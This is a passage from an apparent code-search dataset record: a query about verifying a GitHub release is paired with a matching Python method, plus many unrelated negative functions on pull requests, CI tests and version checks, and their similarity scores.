request.contract.create_contribution(user=user, contribution_type=contribution_type)\n except InvalidContributionTypeError as error:\n raise exc.HTTPBadRequest(error)\n return contribution_to_dict(contribution)", "def submitBuildRequest(ss, reason, props=None, now=False):", "def test_build_new_review_request_on_enterprise_travis(self):\n repository = self._create_repository()\n review_request = self.create_review_request(repository=repository)\n diffset = self.create_diffset(review_request=review_request)\n diffset.base_commit_id = '8fd69d70f07b57c21ad8733c1c04ae604d21493f'\n diffset.save()\n\n config = self._create_config(enterprise=True)\n self.integration.enable_integration()\n\n data = self._spy_on_make_request()\n\n review_request.publish(review_request.submitter)\n\n self.assertTrue(TravisAPI._make_request.called)\n\n self.assertEqual(\n data['url'],\n 'https://travis.example.com/api/repo/'\n 'mypublicorg%2Fmypublicorgrepo/requests')\n\n self.assertEqual(\n data['request']['config']['env']['global'],\n [\n 'REVIEWBOARD_STATUS_UPDATE_ID=1',\n 'REVIEWBOARD_TRAVIS_INTEGRATION_CONFIG_ID=%d' % config.pk,\n ])\n self.assertEqual(data['request']['message'],\n 'Test Summary\\n\\nTest Description')\n self.assertTrue('git checkout %s' % diffset.base_commit_id\n in data['request']['config']['before_install'])\n self.assertEqual(data['request']['branch'], 'review-requests')", "def get_pull_request(project, num, github_api=3):\r\n if github_api==2 :\r\n url = \"http://github.com/api/v2/json/pulls/{project}/{num}\".format(project=project, num=num)\r\n elif github_api == 3:\r\n url = \"https://api.github.com/repos/{project}/pulls/{num}\".format(project=project, num=num)\r\n response = requests.get(url)\r\n response.raise_for_status()\r\n if github_api == 2 :\r\n return json.loads(response.text)['pull']\r\n return json.loads(response.text)", "def create(ctx):\n pass", "def pull_requests_model(self, entry_info, repo_id):\n github_url = entry_info['given']['github_url']\n\n logging.info('Beginning collection of Pull Requests...\\n')\n logging.info(f'Repo ID: {repo_id}, Git URL: {github_url}\\n')\n record_model_process(self, repo_id, 'pull_requests')\n\n owner, repo = self.get_owner_repo(github_url)\n\n url = (f'https://api.github.com/repos/{owner}/{repo}/pulls?state=all&' +\n 'direction=asc&per_page=100&page={}')\n\n # Get pull requests that we already have stored\n # Set pseudo key (something other than PK) to \n # check dupicates with\n table = 'pull_requests'\n table_pkey = 'pull_request_id'\n update_col_map = {'pr_src_state': 'state'} \n duplicate_col_map = {'pr_src_id': 'id'}\n\n #list to hold pull requests needing insertion\n prs = paginate(self, url, duplicate_col_map, update_col_map, table, table_pkey, \n where_clause='WHERE repo_id = {}'.format(repo_id),\n value_update_col_map={'pr_augur_contributor_id': float('nan')})\n\n # Discover and remove duplicates before we start inserting\n logging.info(\"Count of pull requests needing update or insertion: \" + str(len(prs)) + \"\\n\")\n\n for pr_dict in prs:\n\n pr = {\n 'repo_id': repo_id,\n 'pr_url': pr_dict['url'],\n 'pr_src_id': pr_dict['id'],\n 'pr_src_node_id': None,\n 'pr_html_url': pr_dict['html_url'],\n 'pr_diff_url': pr_dict['diff_url'],\n 'pr_patch_url': pr_dict['patch_url'],\n 'pr_issue_url': pr_dict['issue_url'],\n 'pr_augur_issue_id': None,\n 'pr_src_number': pr_dict['number'],\n 'pr_src_state': pr_dict['state'],\n 'pr_src_locked': pr_dict['locked'],\n 'pr_src_title': pr_dict['title'],\n 'pr_augur_contributor_id': find_id_from_login(self, pr_dict['user']['login']),\n 'pr_body': pr_dict['body'],\n 'pr_created_at': pr_dict['created_at'],\n 'pr_updated_at': pr_dict['updated_at'],\n 'pr_closed_at': pr_dict['closed_at'],\n 'pr_merged_at': pr_dict['merged_at'],\n 'pr_merge_commit_sha': pr_dict['merge_commit_sha'],\n 'pr_teams': None,\n 'pr_milestone': pr_dict['milestone']['title'] if pr_dict['milestone'] else None,\n 'pr_commits_url': pr_dict['commits_url'],\n 'pr_review_comments_url': pr_dict['review_comments_url'],\n 'pr_review_comment_url': pr_dict['review_comment_url'],\n 'pr_comments_url': pr_dict['comments_url'],\n 'pr_statuses_url': pr_dict['statuses_url'],\n 'pr_meta_head_id': None,\n 'pr_meta_base_id': None,\n 'pr_src_issue_url': pr_dict['issue_url'],\n 'pr_src_comments_url': pr_dict['comments_url'], # NOTE: this seems redundant\n 'pr_src_review_comments_url': pr_dict['review_comments_url'], # this too\n 'pr_src_commits_url': pr_dict['commits_url'], # this one also seems redundant\n 'pr_src_statuses_url': pr_dict['statuses_url'],\n 'pr_src_author_association': pr_dict['author_association'],\n 'tool_source': self.tool_source,\n 'tool_version': self.tool_version,\n 'data_source': 'GitHub API'\n }\n\n if pr_dict['flag'] == 'need_insertion':\n logging.info(f'PR {pr_dict[\"id\"]} needs to be inserted\\n')\n\n result = self.db.execute(self.pull_requests_table.insert().values(pr))\n logging.info(f\"Added Pull Request: {result.inserted_primary_key}\")\n self.pr_id_inc = int(result.inserted_primary_key[0])\n\n elif pr_dict['flag'] == 'need_update':\n result = self.db.execute(self.pull_requests_table.update().where(\n self.pull_requests_table.c.pr_src_id==pr_dict['id']).values(pr))\n logging.info(\"Updated tuple in the pull_requests table with existing pr_src_id: {}\".format(\n pr_dict['id']))\n self.pr_id_inc = pr_dict['pkey']\n\n else:\n logging.info(\"PR does not need to be inserted. Fetching its id from DB\")\n pr_id_sql = s.sql.text(\"\"\"\n SELECT pull_request_id FROM pull_requests\n WHERE pr_src_id={}\n \"\"\".format(pr_dict['id']))\n\n self.pr_id_inc = int(pd.read_sql(pr_id_sql, self.db).iloc[0]['pull_request_id'])\n\n self.query_labels(pr_dict['labels'], self.pr_id_inc)\n self.query_pr_events(owner, repo, pr_dict['number'], self.pr_id_inc)\n self.query_pr_comments(owner, repo, pr_dict['number'], self.pr_id_inc)\n self.query_reviewers(pr_dict['requested_reviewers'], self.pr_id_inc)\n self.query_pr_meta(pr_dict['head'], pr_dict['base'], self.pr_id_inc)\n\n logging.info(f\"Inserted PR data for {owner}/{repo}\")\n self.results_counter += 1\n\n register_task_completion(self, entry_info, repo_id, 'pull_requests')", "def main():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\"-v\",\n \"--verbose\",\n action=\"store_true\",\n help=\"Show verbose information\")\n group.add_argument(\"-q\",\n \"--quiet\",\n action=\"store_true\",\n help=\"Display less information\")\n parser.add_argument(\n 'category',\n help='Use the task you want to create like issue, pr, repo ',\n choices=[\"issue\", \"pr\", \"repo\"])\n parser.add_argument(\n 'action',\n help='Use the action to perform in the category.',\n choices=[\"create\", \"list\", \"edit\", \"delete\", \"close\", \"status\"])\n parser.add_argument(\"-t\",\n \"--title\",\n help=\"Title of issue or PR or name of repository\")\n parser.add_argument(\"-d\",\n \"--description\",\n help=\"Description of issue or PR or repo.\")\n parser.add_argument(\"-c\", \"--config\", help=\"Configuration file to use.\")\n parser.add_argument(\"-T\",\n \"--token\",\n help=\"Personal access token for github.\")\n parser.add_argument(\"-u\", \"--username\", help=\"Username of the user\")\n parser.add_argument(\"-a\",\n \"--assignee\",\n help=\"Filter by assignee or set assignee\")\n parser.add_argument(\"-b\",\n \"--base\",\n help=\"Filter by base branch the pull request are being merged to (ONLY FOR PR AND REPO)\")\n parser.add_argument(\"-A\", \"--author\", help=\"Filter by or set author\")\n parser.add_argument(\"-l\",\n \"--label\",\n help=\"Filter or set label separated by comma\")\n parser.add_argument(\"-L\", \"--limit\", help=\"Maximum number to fetch\")\n parser.add_argument(\"-s\", \"--state\", help=\"Filter by state\")\n parser.add_argument(\n \"-S\",\n \"--since\",\n help=\"List issues that have been updated at or after the given date.\"\n \" (You can also use value like 2 weeks ago)\")\n parser.add_argument(\"-r\",\n \"--repo\",\n help=\"Repository to perform action on.\")\n args = parser.parse_args()\n category_specific_action = handle_category_action(args)\n category_specific_action(args)\n return 0" ]
[ "0.70592564", "0.704382", "0.6956816", "0.6912854", "0.6759392", "0.6718217", "0.67178744", "0.66204125", "0.6516321", "0.6229428", "0.61973286", "0.61781627", "0.61508805", "0.614511", "0.614511", "0.61279315", "0.61080235", "0.60647273", "0.60609627", "0.603208", "0.6000777", "0.599494", "0.5949169", "0.59079295", "0.58725953", "0.5867142", "0.5843201", "0.58339804", "0.5820124", "0.5817992", "0.5784577", "0.57795835", "0.57634866", "0.5681204", "0.5676789", "0.5651529", "0.56498605", "0.5633753", "0.5621708", "0.558797", "0.55783206", "0.5567122", "0.5555468", "0.5535916", "0.5532292", "0.5502343", "0.548607", "0.5437993", "0.54367226", "0.5435886", "0.5432776", "0.54222167", "0.5418501", "0.54146767", "0.53980875", "0.5395783", "0.53827065", "0.5381524", "0.537763", "0.5376005", "0.5372408", "0.53702825", "0.53415114", "0.5335015", "0.5321057", "0.53121114", "0.53049576", "0.5294196", "0.5293648", "0.5288804", "0.5264719", "0.52521366", "0.5250274", "0.5247607", "0.5243057", "0.5235738", "0.5223884", "0.52190065", "0.521649", "0.52127516", "0.5208218", "0.52008396", "0.51978266", "0.5178376", "0.51769817", "0.51732993", "0.5168113", "0.5166213", "0.5163993", "0.5159005", "0.51572776", "0.5156764", "0.51480114", "0.5146914", "0.5142948", "0.51391387", "0.5134191", "0.5125854", "0.5123124", "0.5123065" ]
0.62417126
9
Verify that the release is actually read to be released If the release is new (corresponds to a release branch), then we check that the release is merged into master. If we can not find the release branch, we assume that it is a hotfix and we verify that the major version number matches the latest release.
def check_release_status(self, release_name, release_branch): logger.debug('GitHubAPI.check_release_status args: {}; {}'.format( release_name, release_branch) ) release_version = extract_release_branch_version(release_name) release_branch_base = build_release_base_name(get_config()) # Assume that this is a new release # Check if the release branch is merged into master try: merge_status = self.compare( 'master', release_branch ).get('status') except requests.exceptions.HTTPError as e: logger.debug('HTTPError: {}'.format(e.message)) if not e.response.status_code == 404: raise e else: # can be one of diverged, ahead, behind, identical according to # http://stackoverflow.com/a/23969867 if merge_status in ['diverged', 'ahead']: raise Exception( 'Release must be merged into master before release') return # if the release branch does not exist, then we end up here, # Assume that it is a hotfix raw_version = self.latest_release().get('name', '') if raw_version.startswith(release_branch_base): raw_version = raw_version[len(release_branch_base):] version = extract_year_week_version(raw_version) logger.debug(version) if extract_year_week_version(release_version) != version: raise Exception( 'New release version does not match the current release, ' 'we expected a hotfix.' ) return
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_release_branch():\n diff_string_config_yml = run_command(\"git diff origin/master .circleci/config.yml\")\n if re.search(r'[+-][ ]+CONTENT_VERSION: \".*', diff_string_config_yml):\n return True\n\n return False", "def verify_tags(git_ref_target):\n latest_release = github_util.get_latest_release().get('name')\n latest_commit = run('git rev-list -n 1 {}'.format(latest_release)).stdout.rstrip(\"\\r\\n\")\n if not branch_check(latest_release, git_ref_target):\n print('Your branch does not contain the latest production code. \\n\\\n Please recreate it by branching off of release {}.'.format(latest_release))\n exit(1)\n else:\n print(\"Branch contains the latest production tag\")\n fork_point = run('git merge-base remotes/origin/master remotes/origin/{}'.format(git_ref_target))\n commits_since_fork = run('git rev-list --branches={} {}^..HEAD'.format(git_ref_target,\n fork_point.stdout.rstrip(\"\\r\\n\")))\n if latest_commit not in commits_since_fork.stdout:\n print('Your branch did not fork directly from the last production tag. \\n\\\n Please recreate it by branching off of release {}.'.format(latest_release))\n exit(1)\n else:\n print('Latest production tag is between the fork point and HEAD')", "def is_0_release(release: str) -> bool:\n if release == \"current_branch\":\n return False\n version = packaging.version.parse(release)\n return version < packaging.version.Version(\"1.0\")", "def version_check():\n try:\n with open('git.json', 'r') as fp:\n git_md = json.loads(fp.read())\n except IOError:\n # In the event that there is no git metadata, just print null values\n # twice.\n print \"null\"\n print \"null\"\n return\n\n if git_md['GitHub']:\n if git_md['GitHubUser'] is not None and git_md[\n 'GitHubRepo'] is not None:\n latest_release = json.loads(\n urllib2.urlopen(\n \"https://api.github.com/repos/%s/%s/releases/latest\" % (\n git_md['GitHubUser'], git_md['GitHubRepo'])).read())\n latest_tag = latest_release['tag_name']\n\n # Go through all of the tags to see if this commit matches a tag.\n tags = json.loads(\n urllib2.urlopen(\n \"https://api.github.com/repos/%s/%s/git/refs/tags\" % (\n git_md['GitHubUser'], git_md['GitHubRepo'])).read())\n\n current_tag = \"Unreleased\"\n for tag in tags:\n if tag['object']['sha'] == git_md['GitSHA']:\n current_tag = tag['ref'].split('/')[-1]\n\n print current_tag\n print latest_tag\n else:\n print \"MissingGitHubDetails\"\n print \"MissingGitHubDetails\"\n else:\n # In the event that there is a git file, but it doesn't indicate GitHub\n # then just print some stuff indicating that.\n print \"NonGitHub\"\n print \"NonGitHub\"", "def test_release_tag(self) -> None:\n self.assertEqual(\"v3.14.15\", release_tag())", "def test_master_versions(self):\n m = self.d.master(4242)\n r = self.d.release(79)\n v = m.versions\n\n self.assertEqual(len(v), 2)\n self.assertTrue(r in v)\n self.assertEqual(r.master, m)\n\n r2 = self.d.release(3329867)\n self.assertTrue(r2.master is None)", "def is_release():\n return VERSION[-1]", "def is_release(self):\n # version string: N.N.N.N is for release.\n return bool(re.match(r'^[\\d.]+$', self.version))", "def test_release_tag_for_dev_version(self) -> None:\n self.assertEqual(\"v42.12\", release_tag())", "def test_release(self):\n runCommand(\n [\"git\", \"checkout\", \"-b\", \"release-16.11111-9001\"], cwd=self.repo.path\n )\n\n somefile = self.repo.child(\"somefile\")\n somefile.setContent(b\"change\")\n\n runCommand([\"git\", \"add\", somefile.path, somefile.path], cwd=self.repo.path)\n runCommand([\"git\", \"commit\", \"-m\", \"some file\"], cwd=self.repo.path)\n\n logs = []\n\n with self.assertRaises(SystemExit) as e:\n CheckNewsfragmentScript(logs.append).main([self.repo.path])\n\n self.assertEqual(e.exception.args, (0,))\n self.assertEqual(logs[-1], \"Release branch with no newsfragments, all good.\")", "def test_release_update_available_MAJOR(self):\n NEXT = '%d.%d-%d' % (MAJOR + 1, 0, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR + 1, 0, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def test_pre_release(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n if len(new_version_parts) > 4:\n new_version_parts[4] = int(new_version_parts[4]) + 1\n elif len(new_version_parts) > 3:\n new_version_parts.append(1)\n else:\n new_version_parts.extend(['a', 1])\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is True", "def check_if_release_version_ok(\n past_releases: list[ReleaseInfo],\n current_release_version: str,\n) -> tuple[str, str | None]:\n previous_release_version = past_releases[0].release_version if past_releases else None\n if current_release_version == \"\":\n if previous_release_version:\n current_release_version = previous_release_version\n else:\n current_release_version = (datetime.today() + timedelta(days=5)).strftime(\"%Y.%m.%d\")\n if previous_release_version:\n if Version(current_release_version) < Version(previous_release_version):\n console.print(\n f\"[red]The release {current_release_version} must be not less than \"\n f\"{previous_release_version} - last release for the package[/]\"\n )\n raise Exception(\"Bad release version\")\n return current_release_version, previous_release_version", "def test_version_check_update_available(self):\n output = self.run_command(\"selfupdate --check bennr01:selfupdate_test_future\", exitcode=0)\n self.assertIn(\"Target: bennr01:selfupdate_test_future\", output)\n self.assertNotIn(\"Target: ywangd:master\", output)\n self.assertNotIn(\"Already at latest version\", output)\n self.assertIn(\"New version available\", output)\n self.assertNotIn(\"Error: \", output)", "def test_release_update_available_PATCH(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR, PATCH + 1)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def _is_version_uptodate(self):\n logging.info(\"Checking tesseract version\")\n cmd = '%s -v' % (self.binary)\n logging.info(cmd) \n try:\n ret_output = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)\n except CalledProcessError:\n # Could not run tesseract\n error(self.msgs['TS_MISSING'])\n\n ver_str = '0.0.0'\n for line in ret_output.splitlines():\n if 'tesseract' in line:\n ver_str = line.split(' ')[1]\n if ver_str.endswith('dev'): # Fix for version strings that end in 'dev'\n ver_str = ver_str[:-3]\n\n # Iterate through the version dots\n ver = [int(x) for x in ver_str.split('.')]\n req = [int(x) for x in self.required.split('.')]\n\n # Aargh, in windows 3.02.02 is reported as version 3.02 \n # SFKM\n if str(os.name) == 'nt':\n req = req[:2]\n\n version_good = False\n for i,num in enumerate(req):\n if len(ver) < i+1:\n # This minor version number is not present in tesseract, so it must be\n # lower than required. (3.02 < 3.02.01)\n break\n if ver[i]==num and len(ver) == i+1 and len(ver)==len(req):\n # 3.02.02 == 3.02.02\n version_good = True\n continue\n if ver[i]>num:\n # 4.0 > 3.02.02\n # 3.03.02 > 3.02.02\n version_good = True\n break\n if ver[i]<num:\n # 3.01.02 < 3.02.02\n break\n \n return version_good, ver_str", "def test_check_version_release(self):\n with self.assertLogs(\"dakara_feeder.version\", \"DEBUG\") as logger:\n with patch.multiple(\n \"dakara_feeder.version\", __version__=\"0.0.0\", __date__=\"1970-01-01\"\n ):\n check_version()\n\n # assert effect on logs\n self.assertListEqual(\n logger.output,\n [\"INFO:dakara_feeder.version:\" \"Dakara feeder 0.0.0 (1970-01-01)\"],\n )", "def test_release_update_available_MINOR(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR + 1, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR + 1, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def test_release_version_found(self, mock_git_info): # pylint: disable=invalid-name, unused-argument\n set_version_from_git_tag(self.project, self.logger)\n self.assertEqual(self.logger.info.call_count, 2)\n self.assertEqual(self.project.version, '1.2.3')", "def verify_branch(path, expected_branch=\"master\"):\n\n sys.stdout.write(\" - Verifying your branch is %s:\" % expected_branch)\n branch = run_in_component(path, ['git', 'rev-parse', '--abbrev-ref', 'HEAD'])\n branch = branch.strip()\n\n if branch == expected_branch:\n print(\" OKAY\")\n return\n\n print(\" FAILED\")\n\n raise GenericError(\"You must be on branch %s to release, you are on %s\" % (expected_branch, branch))", "def check_tag_version(self):\n import subprocess\n\n version = self.get_tag()\n version = version[version.rfind(\"-\") + 1 :]\n\n if robocorp_code.__version__ == version:\n sys.stderr.write(\"Version matches (%s) (exit(0))\\n\" % (version,))\n sys.exit(0)\n else:\n sys.stderr.write(\n \"Version does not match (found in sources: %s != tag: %s) (exit(1))\\n\"\n % (robocorp_code.__version__, version)\n )\n sys.exit(1)", "def test_release_update_available_CURRENT(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR + 1, 0)\n self._ucr({\n 'repository/online/component/a': 'yes',\n 'repository/online/component/a/version': 'current',\n })\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR + 1, NEXT): DATA,\n })\n self.assertRaises(U.RequiredComponentError, self.u.release_update_available, errorsto='exception')", "def test_release_version():\n pkg_vars = {}\n with open(VERSION_FILE) as f:\n exec(f.read(), pkg_vars) # nosec\n project_version = pkg_vars[\"__version__\"]\n assert (\n RELEASE_TAG == f\"v{project_version}\"\n ), \"RELEASE_TAG does not match the project version\"", "def checkCMSSWVersion(self, url = \"https://cmssdt.cern.ch/SDT/cgi-bin\", fileName = \"ReleasesXML?anytype=1\"):\n\n downloader = Downloader(url)\n goodRelease = False\n tagCollectorUrl = url + '/' + fileName\n\n try:\n result = downloader.config(fileName)\n except:\n common.logger.info(\"ERROR: Problem reading file of allowed CMSSW releases.\")\n\n try:\n events = pulldom.parseString(result)\n\n arch = None\n release = None\n relState = None\n for (event, node) in events:\n if event == pulldom.START_ELEMENT:\n if node.tagName == 'architecture':\n arch = node.attributes.getNamedItem('name').nodeValue\n if node.tagName == 'project':\n relState = node.attributes.getNamedItem('state').nodeValue\n if relState == 'Announced':\n release = node.attributes.getNamedItem('label').nodeValue\n if self.executable_arch == arch and self.version == release:\n goodRelease = True\n return goodRelease\n except:\n common.logger.info(\"Problems parsing file of allowed CMSSW releases.\")\n\n if not goodRelease and \\\n not self.cfg_params.get('CMSSW.allow_nonproductioncmssw',0)==\"1\" :\n msg = \"ERROR: %s on %s is not among supported releases listed at \\n %s .\" % (self.version, self.executable_arch, tagCollectorUrl)\n msg += \"\\n If you are sure of what you are doing you can set\"\n msg += \"\\n allow_NonProductionCMSSW = 1\"\n msg += \"\\n in the [CMSSW] section of crab.cfg.\"\n raise CrabException(msg)\n\n return goodRelease", "def test_release_update_available_NO(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/all/Packages.gz' % (MAJOR, MINOR, MAJOR, MINOR, PATCH): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(None, next)", "def verify_support():\n ostype, majorrelease, _ = get_os_release_data()\n if ostype not in _supported_os:\n _logger.info('OS type %s is not supported.', ostype)\n return False\n if majorrelease not in _supported_release:\n _logger.info('OS %s %s is not supported', ostype, majorrelease)\n return False\n return True", "def test_dev_version_if_dirty(self, mock_git_info): # pylint: disable=invalid-name, unused-argument\n # Test `patch` part\n self.get_dev_version('patch')\n self.assertEqual(self.project.version, '1.2.4.dev')\n # Test `minor` part\n self.get_dev_version('minor')\n self.assertEqual(self.project.version, '1.3.0.dev')\n # Test `major` part\n self.get_dev_version('major')\n self.assertEqual(self.project.version, '2.0.0.dev')\n # Test incorrect part\n self.project.set_property('semver_git_tag_increment_part', 'incorrect')\n with self.assertRaises(BuildFailedException) as context:\n set_version_from_git_tag(self.project, self.logger)\n err_msg = str(context.exception)\n self.assertTrue(\n (\"Incorrect value for `semver_git_tag_increment_part` property. \"\n \"Has to be in (`major`, `minor`, `patch`), \"\n \"but `incorrect` passed.\") in err_msg)", "def is_dev_version(cls):\n\n # We initiate the command we have to run in order to\n # get the branch we are currently working with.\n command = \"git branch\"\n\n # We execute and get the command output.\n command_result = PyFunceble.helpers.Command(command).execute()\n\n for branch in command_result.split(\"\\n\"):\n # We loop through each line of the command output.\n\n if branch.startswith(\"*\") and (\"dev\" in branch or \"3.x\" in branch):\n # The current branch is `dev`.\n\n # We return True.\n return True\n\n # The current branch is not `dev`.\n\n # We return False.\n return False", "def test_version(self):\n version_instance = get_version('kolibri', __file__)\n self.assertIn(version_instance.major_version, kolibri.__version__)", "def check_release_exists(self, **kwargs):\n\n # List all available releases for logging and debugging purposes\n # These values are not used to actually check if the release is available\n logging.info(f\"Listing available releases since start date ({self.start_date}):\")\n for dt in pendulum.period(pendulum.instance(self.start_date), pendulum.today(\"UTC\")).range(\"years\"):\n response = requests.get(f\"https://api.crossref.org/snapshots/monthly/{dt.year}\")\n soup = BeautifulSoup(response.text)\n hrefs = soup.find_all(\"a\", href=True)\n for href in hrefs:\n logging.info(href[\"href\"])\n\n # Construct the release for the execution date and check if it exists.\n # The release for a given execution_date is added on the 5th day of the following month.\n # E.g. the 2020-05 release is added to the website on 2020-06-05.\n data_interval_start = kwargs[\"data_interval_start\"]\n exists = check_release_exists(data_interval_start, self.api_key)\n assert (\n exists\n ), f\"check_release_exists: release doesn't exist for month {data_interval_start.year}-{data_interval_start.month}, something is wrong and needs investigating.\"\n\n return True", "def test_dev_version_if_tagged_not_last_commit(self, mock_git_info): # pylint: disable=invalid-name, unused-argument\n # Test `patch` part\n self.get_dev_version('patch')\n self.assertEqual(self.project.version, '1.2.4.dev')\n # Test `minor` part\n self.get_dev_version('minor')\n self.assertEqual(self.project.version, '1.3.0.dev')\n # Test `major` part\n self.get_dev_version('major')\n self.assertEqual(self.project.version, '2.0.0.dev')\n # Test incorrect part\n self.project.set_property('semver_git_tag_increment_part', 'incorrect')\n with self.assertRaises(BuildFailedException) as context:\n set_version_from_git_tag(self.project, self.logger)\n err_msg = str(context.exception)\n self.assertTrue(\n (\"Incorrect value for `semver_git_tag_increment_part` property. \"\n \"Has to be in (`major`, `minor`, `patch`), \"\n \"but `incorrect` passed.\") in err_msg)", "def test_up_to_date(self):\n last_public_release = get_pypi_version()\n self.assertFalse(update_available(last_public_release))", "def release_status_check(release_id):\n logger.info(f\"Checking release status for {release_id}\")\n release = Release.objects.get(kf_id=release_id)\n release.status_check()", "def version_is_full_release(version_string):\n match = VERSION_REGEX.match(version_string)\n\n if match and match.groupdict()[\"modifier\"] == \"\":\n return True\n else:\n return False", "def test_finish_release_merge_conflict_tag(self):\n version_filename = 'VERSION'\n new_version = '1.1\\n'\n\n gitflow = GitFlow(self.repo).init()\n fmgr = FeatureBranchManager(gitflow)\n fmgr.finish('even')\n fake_commit(self.repo, 'Overwrite version',\n filename=version_filename,\n change=new_version)\n\n # verify that the tag does not yet exist\n # \"v\" comes form \"versiontag\" prefix in the gitflow config for the \"release\" fixture\n self.assertNotIn('v1.0', self.repo.tags)\n\n mgr = ReleaseBranchManager(gitflow)\n taginfo = dict(\n message='Tagging version 1.0',\n )\n self.assertRaises(MergeError,\n mgr.finish, '1.0', tagging_info=taginfo)\n\n # verify that the tag exists, even though there was a failed merge\n self.assertIn('v1.0', self.repo.tags)\n\n # resolve the conflict\n # this is in favor of the change on develop\n write_file(filename=version_filename,\n append=False,\n change=new_version)\n gitflow.git.add(version_filename)\n gitflow.git.commit('-F.git/MERGE_MSG')\n # the release branch is still here\n self.assertIn('rel/1.0',\n [b.name for b in self.repo.branches])\n # finish the release again\n # this should skip the tagging, since that part previously succeeded\n mgr.finish('1.0', tagging_info=taginfo)\n # now the release branch is gone\n self.assertNotIn('rel/1.0',\n [b.name for b in self.repo.branches])\n\n # verify that the tag still exists\n self.assertIn('v1.0', self.repo.tags)", "def should_deploy(request):\n\n data = json.loads(request.data.decode())\n\n if not data.get(\"pull_request\"):\n return False\n\n return data[\"action\"] == \"closed\" and data[\"pull_request\"][\"merged\"]", "def test_os_release(self):\n self.assertEqual(self.settings.OS_RELEASE, platform.release())", "def test_minor(self):\n self.assertEqual(1, self._version1.minor())\n self.assertEqual(3, self._version2.minor())", "def _checkUpdateNeeded(self):\n try:\n currentVersionLine = str(subprocess.run(['pacman', '-Q', '-i', self._name],\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT, check=True).stdout)\n currentVersion = re.sub(r'.*Version\\s*: ([\\d|\\.]*)-.*', r'\\1', currentVersionLine).split('.')\n newVersion = self._version.split('.')\n for i in range(0, min(len(currentVersion), len(newVersion))):\n if currentVersion[i].isdigit():\n # TODO: test if new version is only digits too, two of them should be the same anyway\n if int(newVersion[i]) > int(currentVersion[i]):\n return True\n if int(newVersion[i]) < int(currentVersion[i]):\n return False\n return len(newVersion) > len(currentVersion)\n except subprocess.CalledProcessError:\n # Package not found: to be installed then\n return True", "def test_changeVersionsWithPrerelease(self):\n self._testVersionChanging(9, 2, 7, 38)", "def test_check_version_non_release(self):\n with self.assertLogs(\"dakara_feeder.version\", \"DEBUG\") as logger:\n with patch.multiple(\n \"dakara_feeder.version\", __version__=\"0.1.0-dev\", __date__=\"1970-01-01\"\n ):\n check_version()\n\n # assert effect on logs\n self.assertListEqual(\n logger.output,\n [\n \"INFO:dakara_feeder.version:\" \"Dakara feeder 0.1.0-dev (1970-01-01)\",\n \"WARNING:dakara_feeder.version:\"\n \"You are running a dev version, use it at your own risks!\",\n ],\n )", "def test_create_release(self):\n releases_before = self.hello_world_project.get_releases()\n latest_release = releases_before[0].tag_name\n count_before = len(releases_before)\n increased_release = \".\".join(\n [\n latest_release.rsplit(\".\", 1)[0],\n str(int(latest_release.rsplit(\".\", 1)[1]) + 1),\n ]\n )\n release = self.hello_world_project.create_release(\n tag=increased_release, name=\"test\", message=\"testing release\"\n )\n count_after = len(self.hello_world_project.get_releases())\n assert release.tag_name == increased_release\n assert release.title == \"test\"\n assert release.body == \"testing release\"\n assert count_before + 1 == count_after", "def test_major(self):\n self.assertEqual(\"0\", self._version1.major())\n self.assertEqual(\"1.2\", self._version2.major())", "def test_minor(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n new_version_parts[1] = int(new_version_parts[1]) + 1\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is True", "def check_release_exists(month: pendulum.DateTime, api_key: str) -> bool:\n\n url = make_snapshot_url(month)\n logging.info(f\"Checking if available release exists for {month.year}-{month.month}\")\n\n # Get API key: it is required to check the head now\n response = retry_session().head(url, headers={\"Crossref-Plus-API-Token\": f\"Bearer {api_key}\"})\n if response.status_code == 302:\n logging.info(f\"Snapshot exists at url: {url}, response code: {response.status_code}\")\n return True\n else:\n logging.info(\n f\"Snapshot does not exist at url: {url}, response code: {response.status_code}, \"\n f\"reason: {response.reason}\"\n )\n return False", "def update_os_release_file(**kwargs):\n\n LOGGER.info(\"Doing pre-flight checks\")\n\n releases_repo_url = OPENSTACK_REPOS + '/releases.git'\n releases_folder = kwargs['workdir'] + '/releases'\n\n oa_folder = kwargs['workdir'] + '/openstack-ansible'\n click.confirm((\"Are your sure your {} folder is properly \"\n \"checked out at the right version?\").format(oa_folder),\n abort=True)\n\n # Args validation\n if kwargs['branch'] not in VALID_CODE_NAMES:\n raise SystemExit(\"Invalid branch name {}\".format(kwargs['branch']))\n\n # Version validation\n if kwargs['version'] == \"auto\":\n fpth, version = get_oa_version(oa_folder)\n LOGGER.info(\"Version {} found in {}\".format(version, fpth))\n if version == \"master\":\n raise SystemExit(\"You should not release from a moving target\")\n else:\n version = kwargs['version']\n\n pre_release = (version.endswith(PRE_RELEASE_PREFIXES))\n\n if not pre_release:\n # For extra safety, ensure it's semver.\n try:\n semver_res = semver.parse(version)\n except Exception as exc:\n raise SystemExit(exc)\n major_version = semver_res['major']\n else:\n major_version = int(version.split(\".\")[0])\n\n if major_version != VALID_CODE_NAMES[kwargs['branch']]:\n raise SystemExit(\"Not a valid number for this series\")\n # Args validation done.\n\n yaml = YAML()\n oa = Repo(oa_folder)\n head_commit = oa.head.commit\n LOGGER.info(\"OpenStack-Ansible current SHA {}\".format(head_commit))\n if os.path.lexists(releases_folder):\n click.confirm('Deleting ' + releases_folder + '. OK?', abort=True)\n 